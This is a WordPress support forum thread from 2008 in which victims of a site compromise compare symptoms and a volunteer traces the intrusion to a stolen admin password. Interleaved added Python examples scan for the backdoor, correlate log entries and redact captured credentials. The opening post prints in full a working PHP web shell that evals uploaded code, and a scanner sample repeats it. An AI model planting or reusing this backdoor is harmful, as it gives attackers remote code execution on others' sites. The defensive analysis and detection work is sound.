Title: Theme-editing exploit?
Last modified: August 19, 2016

---

# Theme-editing exploit?

 *  [lucent](https://wordpress.org/support/users/lucent/)
 * (@lucent)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/theme-editing-exploit/)
 * My WordPress installation has been exploited before by the various XML-RPC edits,
   but I believe I’d cleaned up everything. Today I noticed 3 distinctive hex strings
   at the top of every page. WordPress is otherwise fully functional.
 *     ```
       c1608e58b7a40647381b4667630bf061
       82d58bfc8dc7a2fa985939b01d5b694f
       69175bee376c12eba6ddbd1f632a7f10
       ```
   
 * Google results show others who were victims of the same exploit. Overwriting all
   files with another installation does not change this, suggesting it involves a
   theme that was not overwritten. I use a modified Hemingway.
 * The following files are compromised:
 *     ```
       fixed_wp-blog-header.php
       wp-admin/includes/fixed_schema.php
       wp-admin/import/fixed_rss.php
       wp-admin/fixed_edit-form-advanced.php
       wp-content/fixed_wp-cache-config.php
       wp-content/plugins/wp-super-cache/plugins/fixed_searchengine.php
       wp-content/plugins/wp-super-cache/fixed_wp-cache-base.php
       wp-content/plugins/geourl/fixed_geourl.php
       wp-content/plugins/ald-meebome/fixed_admin.inc.php
       wp-content/plugins/akismet/fixed_akismet.php
       wp-content/plugins/fixed_hello.php
       wp-content/themes/default/images/fixed_header-img.php
       wp-content/themes/default/fixed_header.php
       wp-content/themes/hemingway/blocks/fixed_related_posts.php
       wp-content/themes/classic/fixed_header.php
       wp-content/themes/quentin/fixed_header.php
       wp-includes/js/fixed_wp-ajax-js.php
       wp-includes/js/tinymce/plugins/spellchecker/includes/fixed_general.php
       wp-includes/js/tinymce/plugins/spellchecker/fixed_config.php
       wp-includes/js/tinymce/plugins/spellchecker/classes/utils/fixed_Logger.php
       wp-includes/js/tinymce/plugins/spellchecker/classes/fixed_TinyPspellShell.class.php
       wp-includes/js/tinymce/langs/fixed_wp-langs.php
       wp-includes/js/tinymce/fixed_tiny_mce_config.php
       wp-includes/fixed_pluggable-functions.php
       wp-stats.php
       ```
   
 * The exploit was apparently triggered by the following visit which occurred after
   I had installed 2.5:
 *     ```
       web.moea.unam.mx - - [14/Apr/2008:14:45:52 -0600] "POST /wp-login.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
       mostro.politicas.unam.mx - - [14/Apr/2008:14:45:55 -0600] "GET /wp-admin/theme-editor.php HTTP/1.0" 200 19961 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
       mostro.politicas.unam.mx - - [14/Apr/2008:14:45:59 -0600] "GET /wp-admin/theme-editor.php?file=wp-content/themes/hemingway/index.php&theme=Hemingway HTTP/1.0" 200 9922 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
       web.moea.unam.mx - - [14/Apr/2008:14:46:03 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
       web.moea.unam.mx - - [14/Apr/2008:14:46:07 -0600] "POST / HTTP/1.0" 200 12570 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
       web.moea.unam.mx - - [14/Apr/2008:14:46:11 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
       mostro.politicas.unam.mx - - [14/Apr/2008:14:46:14 -0600] "GET /wp-login.php?action=logout HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
       ```
   
 * It’s entirely possible I’ve had these files for some time and they were implanted
   by an earlier exploit, but did not express themselves until perhaps a new theme-
   editing exploit reactivated them. I’m not familiar at all with WordPress’s workings
   or its security.
 * I believe all of the files contain the same code, buffered with many blank lines
   before and after. The “PASSWD” may be different in different files:
 *     ```
        <?php
        // Found as-is: a password-gated dropper. On a plain page load it only
        // prints its stage markers, which is why hex strings appear at the top
        // of every page that includes it.
        @error_reporting(E_ALL);
        @set_time_limit(0);
        global $HTTP_SERVER_VARS;
    
        // The attacker's password, stored as an MD5 hash and compared below.
        define('PASSWD','92c06d9c2c240ddd01f7cb449db72103');
    
        function say($t) {
          echo "$t\n";
        };
    
        // Prints md5("mark_<stage>") so the operator can tell which branch ran.
        function testdata($t) {
          say(md5("mark_$t"));
        };
    
        echo "<pre>";
        testdata('start');
        if (md5($_POST["p"]) == PASSWD) {
          // Stage 1: uploaded file "s" is written beside this script under its
          // original name: an arbitrary file write used to drop more copies.
          if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
            $HTTP_POST_FILES["s"]["size"])) {
              if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
              {
              testdata('save_ok');
              };
              //eval($code);
          } else {
            testdata('save_fail');
          };
    
          // Stage 2: uploaded file "f" is passed straight to eval(): arbitrary
          // PHP execution as the web server user.
          if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
            $HTTP_POST_FILES["f"]["size"]))
          {
              eval($code);
              testdata('ok');
          } else {
            testdata('fail');
          };
    
        } else {
          // No or wrong password: only 'start', 'pass' and 'end' are printed.
          testdata('pass');
        };
    
        testdata('end');
        echo "</pre>";
        ?>
        ```
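
An added example, not code from this thread or from WordPress, for hunting the dropper above across an install. It builds a throwaway tree from constructed samples (a copy of the posted backdoor padded with blank lines, a benign theme file, and a benign file carrying the `fixed_` prefix) and scans every `.php` file for the backdoor's traits: an MD5-compared `$_POST` password, reading an uploaded file, `eval()` of a variable, and `fwrite()` of the upload, plus the `fixed_*`/`co_*` names reported in this thread. It also computes the three markers the dropper prints on a plain GET (`mark_start`, `mark_pass`, `mark_end`), so you can compare them against the strings at the top of your pages. File names and regexes are this example's own assumptions.

```python
"""Scan a WordPress tree for the upload-and-eval PHP backdoor posted above."""
import hashlib
import os
import re
import tempfile

# Constructed sample: same structure as the posted dropper, padded with blank
# lines before and after the way the poster described.
BACKDOOR_SAMPLE = "\n" * 40 + """<?php
@error_reporting(E_ALL);
define('PASSWD','92c06d9c2c240ddd01f7cb449db72103');
if (md5($_POST["p"]) == PASSWD) {
  if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["s"]["size"])) {
      @fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code);
  }
  if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["f"]["size"])) {
      eval($code);
  }
}
?>""" + "\n" * 40

# Constructed benign theme file for contrast.
BENIGN_SAMPLE = "<?php\nget_header();\nwp_head();\n?>\n"

# Content indicators (assumed signatures, derived from the posted code).
INDICATORS = {
    "md5_post_password_gate": re.compile(r"md5\s*\(\s*\$_POST\s*\["),
    "reads_uploaded_file": re.compile(r"\$(HTTP_POST_FILES|_FILES)\s*\[[^\]]+\]\s*\[\s*['\"]tmp_name"),
    "eval_of_variable": re.compile(r"eval\s*\(\s*\$"),
    "writes_file_from_upload": re.compile(r"fwrite\s*\(\s*@?fopen\s*\("),
}
# Names seen in this thread: copies dropped beside the real files.
DROPPER_NAME = re.compile(r"^(fixed|co)_.+\.php$")


def leading_blank_lines(text):
    """Count blank lines before the first non-blank line (the described padding)."""
    n = 0
    for line in text.split("\n"):
        if line.strip():
            break
        n += 1
    return n


def scan_file(path, root):
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {
        "path": os.path.relpath(path, root).replace(os.sep, "/"),
        "indicators": hits,
        "dropper_name": bool(DROPPER_NAME.match(os.path.basename(path))),
        "leading_blank_lines": leading_blank_lines(text),
    }


def scan_tree(root):
    """Findings for every .php file matching a content indicator or the naming pattern."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            f = scan_file(os.path.join(dirpath, name), root)
            if f["indicators"] or f["dropper_name"]:
                findings.append(f)
    return sorted(findings, key=lambda f: f["path"])


def marker_strings():
    """The three hex strings the dropper prints on a plain GET: stages start, pass, end."""
    return [hashlib.md5(f"mark_{s}".encode()).hexdigest() for s in ("start", "pass", "end")]


def build_sample_tree():
    """Write the constructed samples into a temporary tree and return its root."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    files = {
        "wp-content/themes/hemingway/blocks/fixed_related_posts.php": BACKDOOR_SAMPLE,
        "wp-stats.php": BACKDOOR_SAMPLE,                       # backdoor without the prefix
        "wp-content/themes/hemingway/header.php": BENIGN_SAMPLE,
        "wp-content/plugins/fixed_hello.php": BENIGN_SAMPLE,   # suspicious name only
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_sample_tree()):
        print(finding)
    print("markers on a plain GET:", marker_strings())
```

Run it against a real install with `scan_tree("/path/to/wordpress")`; a hit on `wp-stats.php` in the sample shows why the name pattern alone is not enough and the content indicators matter. Any file flagged by content should be treated as a confirmed web shell and the whole install rebuilt from known-good files, as the thread recommends.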
   

Viewing 11 replies - 1 through 11 (of 11 total)

 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-744705)
 * Once again, what you pasted is not the hack; it’s simply the file access. I stress
   this because it’s nearly identical to another post here.
 * You cannot, once again, you **CANNOT**, open wp-admin/theme-editor without having
   the proper credentials.
 * If you examine what you pasted, you can see that they **logged in**.
 * Install my plugin that provides logging if you want to see exactly what is going
   on:
 * [http://www.village-idiot.org/post-logger/](http://www.village-idiot.org/post-logger/)
 * I’m also going to go out on a limb and say that, since I’ve seen that exact thing
   on older installs that were exploited, your password was compromised some
   time ago.
 * Here’s my bet.
 * You install my logging plugin.
 * You change your password.
 * Within a day, you will see older exploit attempts that worked on the older versions
   for grabbing your admin password.
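
An added example, not the post-logger plugin or any code from the thread, showing the point made above in detection logic: every POST to `wp-admin/theme-editor.php` (a theme-file save) is reported together with the authenticated login that preceded it. The parser handles Apache combined-format lines; it treats a `302` answer to a `POST /wp-login.php` as a successful login (WordPress redirects on success and re-renders the form with `200` on failure; assumed heuristic) and correlates by User-Agent rather than client host, because the lines quoted in the original post show the same Opera User-Agent arriving from two different hosts. The three `10.0.0.5` lines and the final `curl` line are constructed; the rest are the lines from the original post.

```python
"""Correlate theme-editor writes in an Apache access log with the login before them."""
import re
from datetime import datetime, timedelta

# Apache combined log format: host ident user [time] "request" status size "referer" "ua".
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

SAMPLE_LOG = """\
10.0.0.5 - - [14/Apr/2008:13:02:10 -0600] "GET /wp-login.php HTTP/1.1" 200 1524 "-" "Mozilla/5.0 (X11; Linux)"
10.0.0.5 - - [14/Apr/2008:13:02:20 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux)"
10.0.0.5 - - [14/Apr/2008:13:02:25 -0600] "GET /wp-admin/ HTTP/1.1" 200 21890 "-" "Mozilla/5.0 (X11; Linux)"
web.moea.unam.mx - - [14/Apr/2008:14:45:52 -0600] "POST /wp-login.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
mostro.politicas.unam.mx - - [14/Apr/2008:14:45:55 -0600] "GET /wp-admin/theme-editor.php HTTP/1.0" 200 19961 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
mostro.politicas.unam.mx - - [14/Apr/2008:14:45:59 -0600] "GET /wp-admin/theme-editor.php?file=wp-content/themes/hemingway/index.php&theme=Hemingway HTTP/1.0" 200 9922 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
web.moea.unam.mx - - [14/Apr/2008:14:46:03 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
web.moea.unam.mx - - [14/Apr/2008:14:46:07 -0600] "POST / HTTP/1.0" 200 12570 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
web.moea.unam.mx - - [14/Apr/2008:14:46:11 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
mostro.politicas.unam.mx - - [14/Apr/2008:14:46:14 -0600] "GET /wp-login.php?action=logout HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
203.0.113.9 - - [14/Apr/2008:16:10:00 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "curl/7.18.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    e["status"] = int(e["status"])
    e["path"] = e["path"].split("?", 1)[0]  # drop the query string
    return e


def theme_editor_writes(lines, window=timedelta(minutes=30)):
    """Report each theme-editor POST with the successful login(s) that preceded it.

    Login success is inferred from a 302 to POST /wp-login.php (assumed heuristic),
    and requests are correlated by User-Agent within `window`.
    """
    entries = [e for e in map(parse_line, lines) if e]
    logins = [
        e for e in entries
        if e["method"] == "POST" and e["path"] == "/wp-login.php" and e["status"] == 302
    ]
    events = []
    for e in entries:
        if e["method"] != "POST" or e["path"] != "/wp-admin/theme-editor.php":
            continue
        prior = [
            l for l in logins
            if l["ua"] == e["ua"] and timedelta(0) <= e["ts"] - l["ts"] <= window
        ]
        events.append({
            "time": e["ts"].isoformat(),
            "host": e["host"],
            "user_agent": e["ua"],
            "login_seen": bool(prior),
            "login_from": sorted({l["host"] for l in prior}),
        })
    return events


if __name__ == "__main__":
    for ev in theme_editor_writes(SAMPLE_LOG.splitlines()):
        print(ev)
```

The two Opera writes come back with `login_seen` true and the login host, which is the evidence whooami points at: the file edit went through the authenticated editor, so the credential is what was compromised. The constructed `curl` write comes back with no login in the window, which is what a write through a dropped backdoor, or a session older than the log, would look like and deserves a separate look.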
 *  Thread Starter [lucent](https://wordpress.org/support/users/lucent/)
 * (@lucent)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-744712)
 * Thank you. That explanation does seem most likely. I have installed your plugin
   and changed my password and will watch the log.
 *  [b-rad](https://wordpress.org/support/users/b-rad/)
 * (@b-rad)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745000)
 * I received an email from Google saying one of my sites (only a wordpress blog)
   was compromised and that any results for this site would now feature a warning
   from Google. Long story short, I discovered the exact same code in my blog and
   removed it. This seems like a definite exploit in wordpress (2.3.3 here).
 *  [triptol](https://wordpress.org/support/users/triptol/)
 * (@triptol)
 * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745036)
 * I had the same problem. I only found out after I upgraded to 2.5.1 and decided
   to completely reinstall my blog (except for the database).
 * After a little more than half a week, today I finally got lucky with the post-
   logger.
 *     ```
       <?xml_version = \"1.0\"?>
       <methodCall><methodName>metaWeblog.getRecentPosts</methodName>
       	<params>
       		<param><value><string>C6CE3FFB3174106584CBB250C0B0519BF4E294</string></value></param>
       		<param><value><string>UserName</string></value></param>
       		<param><value><string>PassWord</string></value></param>
       		<param><value><int>1</int></value></param>
       	</params>
       </methodCall>
       78.90.14.123
       /xmlrpc.php
       May 11, 2008, 11:20 pm
       ```
   
 * There it was my (now invalid) password from some host in Bulgaria.
 * Now what should I do with this information?
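
An added example, not part of the thread or of the post-logger plugin, for handling a capture like the one above before it is logged or forwarded: it parses the XML-RPC `methodCall`, extracts the method name and typed parameters, and redacts the password. The sample is the captured body quoted in the post, including its malformed `<?xml_version` prolog, which is why everything before `<methodCall` is discarded before parsing. For `metaWeblog.*` methods the username and password are parameters 1 and 2 (after the blogid or postid); other method families are reported without guessing credential positions. The method-to-slot table is this example's own assumption.

```python
"""Parse a captured XML-RPC methodCall and redact the password it carries."""
import xml.etree.ElementTree as ET

# The capture from the post, prolog garbled exactly as the logger wrote it.
CAPTURE = r'''<?xml_version = \"1.0\"?>
<methodCall><methodName>metaWeblog.getRecentPosts</methodName>
  <params>
    <param><value><string>C6CE3FFB3174106584CBB250C0B0519BF4E294</string></value></param>
    <param><value><string>UserName</string></value></param>
    <param><value><string>PassWord</string></value></param>
    <param><value><int>1</int></value></param>
  </params>
</methodCall>'''

# (username, password) parameter indices for the method families this example
# understands; metaWeblog.* calls are (blogid|postid, username, password, ...).
# Assumed table: extend it for other APIs you log.
CREDENTIAL_SLOTS = {"metaWeblog": (1, 2)}


def parse_methodcall(body):
    """Return {'method': name, 'params': [(xmlrpc_type, text), ...]} from a capture."""
    start = body.find("<methodCall")
    if start < 0:
        raise ValueError("no <methodCall> element in capture")
    root = ET.fromstring(body[start:])  # skip the broken prolog and any logger prefix
    params = []
    for value in root.findall("params/param/value"):
        typed = list(value)
        if typed:
            params.append((typed[0].tag, (typed[0].text or "").strip()))
        else:
            # XML-RPC: a <value> with no type element is a string.
            params.append(("string", (value.text or "").strip()))
    return {"method": (root.findtext("methodName") or "").strip(), "params": params}


def summarize_for_log(body):
    """Log-safe view of the call: username kept for attribution, password redacted."""
    call = parse_methodcall(body)
    family = call["method"].split(".", 1)[0]
    slots = CREDENTIAL_SLOTS.get(family)
    params = list(call["params"])
    summary = {
        "method": call["method"],
        "carries_credentials": slots is not None,
        "username": None,
    }
    if slots and len(params) > slots[1]:
        user_i, pass_i = slots
        summary["username"] = params[user_i][1]
        params[pass_i] = (params[pass_i][0], "[REDACTED]")
    summary["params"] = params
    return summary


if __name__ == "__main__":
    print(summarize_for_log(CAPTURE))
```

Applied to the capture above it yields the method, the account name that was used, and the blogid, with the password removed, which is the form you would want to keep in a log or send along with a report; the raw capture with the password still in it is the thing to delete once the password has been changed.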
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745037)
 * You’re using my [post-logger](http://www.village-idiot.org/post-logger) plugin?
   🙂
 * That, btw, should be an old exploit.
 * I am SO glad to know that that captures xmlrpc requests.
 * > Now what should I do with this information?
 * Like I said, that should be an old exploit.
 * If you want though, you can pass that on to [security@wordpress.org](mailto:security@wordpress.org)
   and ref. this thread. Rest assured that if it isn’t, Matt will come along and
   edit this thread.
 * —
 * And good for you, for not only upgrading but for being proactive, and no doubt
   curious enough, to use my plugin to locate the ‘presumed’ entry point. WP needs
   more warriors.
 *  [sonnata](https://wordpress.org/support/users/sonnata/)
 * (@sonnata)
 * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745038)
 * whooami, I downloaded your post-logger, but am not sure how to install it.
 * When I go to my WordPress admin page, I get this code:
 *     ```
       c1608e58b7a40647381b4667630bf061
       82d58bfc8dc7a2fa985939b01d5b694f
       69175bee376c12eba6ddbd1f632a7f10
       ```
 * Same thing I’m seeing when I try to go to my blog page.
 * I do have ftp access to the server & have Fantastico through my host. If I install
   a new version of WordPress over my old one, will my posts remain intact?
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745039)
 * sonnata,
 * I haven’t a clue why you are seeing that. But it’s showing up in Google’s cache
   of your site from May 6.
 * [http://64.233.167.104/search?q=cache:69PNZCe1jk4J:www.homeproductsnmore.net/+http://www.homeproductsnmore.net/&hl=en&ct=clnk&cd=1&gl=us](http://64.233.167.104/search?q=cache:69PNZCe1jk4J:www.homeproductsnmore.net/+http://www.homeproductsnmore.net/&hl=en&ct=clnk&cd=1&gl=us)
 * You’re worrying about apples and oranges — apples being those numbers, and oranges
   being my plugin.
 * In other words, they’re not related.
 * You need to fix the problem with your blog before installing any plugins.
 * > If I install a new version of WordPress over my old one, will my posts remain
   > intact?
 * If you can follow [instructions](http://codex.wordpress.org/Upgrading_WordPress),
   of course they will. But, like I just indicated, what you are seeing might be
   a sign of something that necessitates more than a simple upgrade.
 *  [sonnata](https://wordpress.org/support/users/sonnata/)
 * (@sonnata)
 * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745050)
 * I did not have your plugin installed before this problem occurred. I was hoping
   it would help me track down the cause of it.
 * I have tried upgrading WordPress according to the link you gave me, with both
   the [Three Step Upgrade](http://codex.wordpress.org/Upgrading_WordPress) as well
   as the [more detailed upgrade instructions](http://codex.wordpress.org/Upgrading_WordPress_Extended).
 * Neither worked. Still seeing this code on both the /wp-admin/ page as well
   as [http://www.homeproductsnmore.net/](http://www.homeproductsnmore.net/):
 *     ```
       c1608e58b7a40647381b4667630bf061
       82d58bfc8dc7a2fa985939b01d5b694f
       69175bee376c12eba6ddbd1f632a7f10
       ```
 * BTW, this is the only thing that appears on either page.
 * I have backed up my database. Would moving it to another host & reinstalling
   WordPress there fix this? I’m at a loss as to what to do at this point.
 *  Anonymous User
 * (@anonymized-176544)
 * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745054)
 * Same problem for me today. Files were named co_wp-app.php, co_404.php, etc.
 * If I delete xmlrpc.php, what would be the effect on these attacks? Would I be
   able to use pingback or receive pingback?
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745055)
 * If you remove or rename xmlrpc.php you will not be able to receive pingbacks.
   I don’t know about sending them, though. Trackbacks should still work.
 *  [jingan-eugen](https://wordpress.org/support/users/jingan-eugen/)
 * (@jingan-eugen)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745065)
 * You should check this too: [http://www.bloggerguide.net/blog-platform/wordpress/wordpress-exploit-giving-backlinks-redirects-and-headaches-but-no-visitors/](http://www.bloggerguide.net/blog-platform/wordpress/wordpress-exploit-giving-backlinks-redirects-and-headaches-but-no-visitors/)

The topic ‘Theme-editing exploit?’ is closed to new replies.

## Tags

 * [exploit](https://wordpress.org/support/topic-tag/exploit/)

 * In: [Requests and Feedback](https://wordpress.org/support/forum/requests-and-feedback/)
 * 11 replies
 * 7 participants
 * Last reply from: [jingan-eugen](https://wordpress.org/support/users/jingan-eugen/)
 * Last activity: [17 years, 11 months ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745065)
 * Status: not resolved
